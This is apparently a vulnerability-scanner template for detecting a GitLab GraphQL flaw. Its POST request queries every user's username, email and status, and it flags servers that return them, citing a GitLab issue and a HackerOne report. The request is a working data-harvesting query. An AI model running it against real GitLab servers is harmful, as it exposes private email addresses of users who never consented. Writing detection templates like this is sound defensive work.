id: gitlab-private-email-leak
info:
  name: Gitlab Private Email Leak
  risk: Low

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'gitlab'

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/api/graphql
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: 'application/json'
    body: |
      {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "avatarUrl") && StringSearch("resHeaders", "application/json") && StringSearch("body", '"users":')

references:
  - links:
      - https://gitlab.com/gitlab-org/gitlab/-/issues/244275
      - https://hackerone.com/reports/972355